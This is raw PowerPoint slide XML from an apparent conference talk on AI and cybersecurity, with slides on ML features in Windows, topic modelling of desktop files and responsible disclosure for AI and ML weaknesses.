                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971578" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3428744" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3885909" indent="-228582" algn="l" defTabSz="457166"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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Feature based attacks in Cyber vs AI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML Libraries in new version of Windows: It’s a feature not a bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35819798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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Etienne Greeff @</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Montserrat Light" charset="0"/>
                <a:ea typeface="Montserrat Light" charset="0"/>
                <a:cs typeface="Montserrat Light" charset="0"/>
              </a:rPr>
              <a:t>Etienne_greeff</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Montserrat Light" charset="0"/>
              <a:ea typeface="Montserrat Light" charset="0"/>
              <a:cs typeface="Montserrat Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="3717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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F91FFE-E199-43AC-AA42-A75EDEE9CF59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-41832" y="1483614"/>
            <a:ext cx="12290852" cy="5616990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF60EB72-4538-441C-956F-651899641618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186712" y="2546888"/>
            <a:ext cx="3060672" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TOPIC MODELLING FOR FUN AND PROFIT ON DESKTOPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Topic modelling is the process </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of analysing which words are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>used together the most in the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>most common ways, in other </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>words what topics does this </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bunch of documents discuss </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>using which words.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 2" descr="https://i0.wp.com/www.scottbot.net/HIAL/wp-content/uploads/2011/11/IntroToLDA.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C548FE32-5CBC-4B25-9892-F90C5FC3695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09239" y="2615114"/>
            <a:ext cx="6688348" cy="351979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37948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5D5CB31-B044-4D9B-9353-9219372A66B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486183"/>
            <a:ext cx="12192000" cy="6112933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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17" name="TextBox 16"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31ACA07-81B7-42AF-AAC3-8B9F80E69EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055749" y="2844879"/>
            <a:ext cx="2751287" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>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TOPIC MODELLING FOR FUN AND PROFIT ON DESKTOPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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My Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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2 minutes, 800 files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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Scarily accurate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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Unparalleled insight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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Identify valuable information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B138AF-DF9E-4E32-8163-A561B82FAE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478276" y="2351900"/>
            <a:ext cx="6657975" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268814736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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FEC6F4-0325-410D-B6E4-F9AE57723010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110834" y="2403723"/>
            <a:ext cx="4669679" cy="3231654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RESPONSIBLE DISCLOSURE IN </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THE AI &amp; ML WORLD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mostly disclosed in academic papers first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With software vulnerabilities we all know the rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With AI &amp; ML things are a bit different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628616" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Algorithm weaknesses affect multiple applications including IOT and embedded systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628616" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No culture of responsible disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628616" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AI &amp; ML innovation is mostly in the academic domain at the moment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628616" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Who do you notify? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is a movement to create rules for responsible disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80AB4E8-2BF3-4E7E-811A-FEE0DF7DF82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
